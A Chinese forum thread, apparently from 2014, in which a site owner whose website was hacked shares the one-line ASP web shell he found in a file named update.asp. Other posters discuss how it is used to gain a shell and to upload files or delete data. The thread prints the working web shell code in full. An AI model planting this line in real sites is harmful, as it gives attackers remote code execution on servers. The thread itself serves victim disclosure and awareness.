一句话的强悍木马

显示全部楼层 · 发表于 2014-11-9 20:50:12

文件名update.asp 代码
<%eval request("qc")%>

凡是有此文件<%eval request("***")%>的网站恭喜你被黑了！

前几天因为一时粗心  网站服务器写保护忘记关闭；
我的网站被黑了  被转到性药广告页面了被人盯上了；
而且上传的  邪恶源码达几百mb  于是我通过日期来删除大量文件但是一直在找别人是如何执行上传的终于找到了  上面这行代码；

显示全部楼层 · 发表于 2014-11-9 20:51:21

样本怎么不打包？？？？

显示全部楼层 · 发表于 2014-11-9 20:55:09

蓝天二号发表于 2014-11-9 20:51
样本怎么不打包？？？？

就是update.asp
里面的语句 <%eval request("qc")%>

就这么简单

显示全部楼层 · 发表于 2014-11-9 20:59:45

271200017 发表于 2014-11-9 20:55
就是update.asp
里面的语句

咋运行。。。。。。？

显示全部楼层 · 发表于 2014-11-9 21:18:05

一句话木马
专门针对网页的

只不过一般都是用它拿shell的吧？

显示全部楼层 · 发表于 2014-11-9 21:18:38

蓝天二号发表于 2014-11-9 20:59
咋运行。。。。。。？

http://bbs.csdn.net/topics/330047068

显示全部楼层 · 发表于 2014-11-9 21:30:52

XywCloud 发表于 2014-11-9 21:18
一句话木马
专门针对网页的

挂马；变态的手段；上传，下载，删除数据库；无恶不作；必须把这个代码找到，才能断根；

显示全部楼层 · 发表于 2014-11-9 21:33:41

271200017 发表于 2014-11-9 21:30
挂马；变态的手段；上传，下载，删除数据库；无恶不作；必须把这个代码找到，才能断根；

嗯，那个request("")引号内的代码可以替换成你想要干的事情。

显示全部楼层 · 发表于 2014-11-9 22:21:19

百科http://baike.baidu.com/view/102246.htm

显示全部楼层 · 发表于 2014-11-9 22:40:57

本帖最后由 b573684723 于 2014-11-9 22:42 编辑

发错。。

[病毒样本] 一句话的强悍木马

浏览过的版块

[病毒样本] 一句话的 强悍木马

浏览过的版块

[病毒样本] 一句话的强悍木马